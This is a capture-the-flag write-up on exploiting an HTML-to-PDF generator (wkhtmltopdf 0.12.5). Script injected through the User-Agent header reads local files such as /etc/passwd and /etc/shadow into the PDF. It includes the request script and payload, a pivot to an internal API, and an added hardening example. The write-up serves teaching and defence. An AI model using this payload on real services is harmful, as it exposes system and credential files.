Tags: expl web 



For this challenge, we get a link to a website. Its only feature is to generate a pdf with custom content.

## Finding and exploiting the vulnerability

I first tried to find out which tool actually generates the pdf files. This was pretty simple to find, as I just had to open the file with e.g. Adobe Acrobat and look at the metadata.
The website seems to be running wkhtmltopdf 0.12.5!

I googled for exploits for this tool and quickly found that it has an XSS vulnerability which can be used for LFI (Local File Inclusion) on the backend. To exploit it, I just need to put my script into the User-Agent header. After playing around with it, I also found out that the generator prints the result of the script into the PDF, which really helps.

I used this code to quickly generate the pdfs:

```python
import requests
import time

# Placeholder: the challenge URL is not given in the writeup.
URL = "http://<target>/"

# The payload is an HTML/JS snippet; newlines are stripped so it fits on one header line.
with open("payload.html") as f:
    UA = f.read().replace("\n", "")

# The payload travels in the User-Agent header; the form field only needs some content
# (assumed to be a form-encoded POST).
res = requests.post(
    URL,
    data={"pdf_form": time.time()},
    headers={"User-Agent": UA},
)

with open("/tmp/pdf.pdf", "wb") as f:
    f.write(res.content)
```

And this payload to retrieve file contents:

```html
<script>
x = new XMLHttpRequest();
x.open('GET', 'file:///etc/passwd', false);  // synchronous request to a local file
x.send();
// The surrounding markup was stripped on extraction; the concatenation implies the
// response was written into the page so it ends up in the rendered PDF.
document.write('<pre>' + x.responseText + '</pre>');
</script>
```
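As an added example (not code from the original writeup or the challenge), here is how the Flask side could have neutralised this: HTML-escape the User-Agent and every other user-controlled value before it reaches the template, and run wkhtmltopdf with JavaScript and local file access switched off. The function names, the template layout and the assumption that the header is rendered into a footer are mine; the two wkhtmltopdf flags are real options of the tool.

```python
import html
import subprocess
from typing import List

# Hardened wkhtmltopdf flags:
#   --disable-javascript         injected <script> never runs at all
#   --disable-local-file-access  file:// reads are refused even if a script did run
HARDENED_FLAGS = ["--disable-javascript", "--disable-local-file-access"]


def build_document(title: str, body: str, user_agent: str) -> str:
    """Build the HTML handed to wkhtmltopdf, escaping every attacker-controlled value.

    html.escape turns < > & " ' into entities, so markup in the input is
    rendered as literal text instead of being interpreted by the converter.
    """
    esc = html.escape
    return (
        "<html><body>"
        f"<h1>{esc(title)}</h1>"
        f"<p>{esc(body)}</p>"
        f"<footer>Generated for: {esc(user_agent)}</footer>"  # hypothetical footer
        "</body></html>"
    )


def wkhtmltopdf_command(html_path: str, pdf_path: str) -> List[str]:
    """Argument vector for subprocess; no shell involved, so no quoting issues."""
    return ["wkhtmltopdf", *HARDENED_FLAGS, html_path, pdf_path]


def render_pdf(title: str, body: str, user_agent: str,
               html_path: str = "/tmp/in.html", pdf_path: str = "/tmp/out.pdf") -> str:
    """Write the escaped document to disk and convert it; returns the PDF path."""
    with open(html_path, "w") as f:
        f.write(build_document(title, body, user_agent))
    subprocess.run(wkhtmltopdf_command(html_path, pdf_path), check=True, timeout=30)
    return pdf_path


if __name__ == "__main__":
    # Constructed sample input mimicking the payload-in-User-Agent trick.
    ua = "<script>x=new XMLHttpRequest();x.open('GET','file:///etc/passwd',false);</script>"
    print(build_document("report", "hello", ua))
```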

## Finding something useful

But how do we find the flag now? The usual places like /flag or /root/flag.txt are not available. By chance I found out that we can even read /etc/shadow, but there was nothing unusual inside. I found the kind of web framework running by reading /etc/hostname (flask), and that the pdf is always temporarily saved inside /tmp/.

Then I actually found something interesting. /root/.bash_history contains something...

```
cat /etc/passwd
```

But this didn't lead me any further...

After another while of not finding anything, I found out by reading /etc/hosts that there is a nodeapi running in another container!

## The API

Now we just have to find the proper endpoint. The API listened on port 3000, so I was able to call it with

```html
<iframe src=""></iframe>
```

After some lucky guessing I also found out where the flag was:


Original writeup (https://github.com/xXLeoXxOne/writeups/blob/main/CyberSecurityRumble%202022/PDFCARNAGE.md).